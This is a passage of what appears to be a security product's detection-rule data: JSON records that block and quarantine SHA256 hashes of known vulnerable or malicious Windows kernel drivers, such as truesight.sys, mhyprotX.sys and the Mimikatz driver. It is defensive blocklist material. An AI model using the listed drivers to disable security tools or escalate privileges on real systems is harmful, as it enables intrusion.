"146d50a3-c782-53bf-9ba9-905f5712b1d5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.817551Z", + "creation_date": "2026-03-23T11:45:31.817553Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.817559Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + 
"value": "9341856f3855acf21a36fa25c9539dade2182a029ebac116811eb49abff9cbe7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "146f645d-46b6-5c6f-97db-0da4bc7025c6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817311Z",
+ "creation_date": "2026-03-23T11:45:30.817314Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817319Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "84683c840af3440b8b40d34088ec852e092f882ca558409d8338f1f5f46d2741",
+ "comment": "Vulnerable Kernel Driver (aka AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "14786b4d-b75b-5b06-8270-c6f57694cc25",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.455247Z",
+ "creation_date": "2026-03-23T11:45:30.455251Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.455260Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "651ffa0c7aff7b4a7695dddd209dc3e7f68156e29a14d3fcc17aef4f2a205dcc",
+ "comment": "Vulnerable Kernel Driver (aka Netfilter.sys) [https://www.loldrivers.io/drivers/9454a752-233e-4ba2-b585-8da242bf8f31/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1478990a-6173-5836-b2d1-033d954adc0e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979116Z",
+ "creation_date": "2026-03-23T11:45:29.979118Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979124Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dcd5404c83f74f0b7a8d0735174af78782aaa99d2b5b5b24f44c48b295a2ba31",
+ "comment": "Vulnerable Kernel Driver (aka LHA.sys) [https://www.loldrivers.io/drivers/eb07ef7e-0402-48eb-8e06-8fb76eda5b84/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "147ffe77-4c9a-5ceb-8b85-43b7d1a35d0d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140708Z",
+ "creation_date": "2026-03-23T11:45:31.140710Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140715Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f26e088583f9a5f518c64c2406c70c90ff50142574389459a0da579448a8f0ea",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "14806960-67e3-573d-8cdc-bffe1470d7bf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610581Z",
+ "creation_date": "2026-03-23T11:45:29.610583Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610591Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8cf0cbbdc43f9b977f0fb79e0a0dd0e1adabe08a67d0f40d727c717c747de775",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "14825860-c440-5708-a424-6a93f8981c23",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611949Z",
+ "creation_date": "2026-03-23T11:45:29.611951Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611956Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b8b94c2646b62f6ac08f16514b6efaa9866aa3c581e4c0435a7aeafe569b2418",
+ "comment": "Genshin Impact vulnerable driver (aka mhyprotX.sys) [https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1495dbe3-877c-5c16-afe6-09c53c8ebc3f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974801Z",
+ "creation_date": "2026-03-23T11:45:29.974803Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974808Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "13002b14aa6e63dc7117e2969d038beb009dbd6093a4590c6913b426d773dea3",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1497784d-e0ed-5a05-bc0f-b3f605709cb8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.481104Z",
+ "creation_date": "2026-03-23T11:45:31.481108Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.481117Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0c6bcd1ac8da860f8f9213d19df235669226f455f6a1fc0f975463085e59ad7d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "149a44bc-d5dc-5b73-97ac-292075977f5f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.486934Z",
+ "creation_date": "2026-03-23T11:45:31.486937Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.486955Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fdf17b4b7f4f3fed37647e37bb85448bf06c3e07ea6663d758af1b8a84ea2ca3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "14aefbb1-5c8f-5b0c-8751-ae2d942f7925",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.476932Z",
+ "creation_date": "2026-03-23T11:45:30.476935Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.476951Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5e789b6d535b49c66c658978099e50fa2f8d02c2511bdaf9358bb8e40bdcef8e",
+ "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "14afbff7-3dce-5ef7-a3d9-9dcbca00da51",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142827Z",
+ "creation_date": "2026-03-23T11:45:31.142829Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142834Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "533527cc7c4a72ac5ca7be7b01df2989412bc820da29e3eac0fb24b3be5b8169",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "14b14343-29ad-5b4c-921e-372488ae9ead",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970729Z",
+ "creation_date": "2026-03-23T11:45:29.970732Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970740Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9df2cfbe1c9e6f616726a88310a33bb856126fb490f7f0d16229d97dbb50ae2f",
+ "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "14b734b3-a959-5ccd-a96d-73d5f8a5df6e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976818Z",
+ "creation_date": "2026-03-23T11:45:29.976820Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976826Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7131fedf0462c49e5060d3545f49a74d5f937ad84fc1a747a8a766f61a2958df",
+ "comment": "Malicious Windows Kernel Explorer Driver (aka WindowsKernelExplorer.sys) [https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "14bcf3f3-b464-55fe-9b38-89ba68af65ee",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982068Z",
+ "creation_date": "2026-03-23T11:45:29.982070Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982076Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2470fd1b733314c9b0afa19fd39c5d19aa1b36db598b5ebbe93445caa545da5f",
+ "comment": "Vulnerable Kernel Driver (aka rwdrv.sys) [https://www.loldrivers.io/drivers/b03798af-d25a-400b-9236-4643a802846f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "14c1febc-aa56-50a6-b6ec-fc2ef883b207",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.478552Z",
+ "creation_date": "2026-03-23T11:45:31.478556Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.478581Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "415a90c32f8b4651eb5c81cae348549d8792da1b9dac8fbefe0178667b947238",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "14cc30b4-746b-51cf-8a66-6d987602cc2c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835684Z",
+ "creation_date": "2026-03-23T11:45:30.835686Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835691Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b6a14e072636da3560bc7d52ccf9c6c6706666eb7e813b422e88782ca1b4d838",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "14d06643-7993-59f5-b03a-d670d8fc33cf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480168Z",
+ "creation_date": "2026-03-23T11:45:30.480170Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480176Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f82cde6dc693a4ac8b485ac9225f2641141213f8333b0be8d7134d0139f17c26",
+ "comment": "Vulnerable Kernel Driver (aka IoAccesssys.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "14db5509-3e34-5a9f-946a-27d4011c4f58",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617341Z",
+ "creation_date": "2026-03-23T11:45:29.617343Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617348Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "321cc3f24a518c70fb537ee9472b1777d05727c649d5b6538082a971c40ddcbe",
+ "comment": "ATI Technologies vulnerable GPU flash tool (aka atillk64.sys) [CVE-2020-12138] [https://www.loldrivers.io/drivers/61514cbd-6f34-4a3e-a022-9ecbccc16feb/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "14de6487-6f53-50e3-8419-c512e4cb71b0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.478760Z",
+ "creation_date": "2026-03-23T11:45:30.478763Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.478772Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4bef5f5160c6a981562597dda319f9a235c28d5beba5268a454f734500ec1f4f",
+ "comment": "Vulnerable Kernel Driver (aka Tmel.sys) [https://www.loldrivers.io/drivers/1aeb1205-8b02-42b6-a563-b953ea337c19/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "14e9eaeb-27b8-5416-a2db-03d761558401",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144540Z",
+ "creation_date": "2026-03-23T11:45:32.144542Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144548Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0dc9021f0c02e18f4c3357da42630adf515655b9473f93385c5c157efd5da4ac",
+ "comment": "Malicious Kernel Driver (aka driver_4d8bc539.sys) [https://www.loldrivers.io/drivers/e7fd8ffc-ab37-4a7b-8dc9-fc7432fbacae/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "14ffc62a-9a7c-5143-b386-065e7d9c6c70",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614455Z",
+ "creation_date": "2026-03-23T11:45:29.614457Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614462Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "30706f110725199e338e9cc1c940d9a644d19a14f0eb8847712cba4cacda67ab",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "15022bcb-7506-5cc8-bda0-a4d81bb9a593",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826296Z",
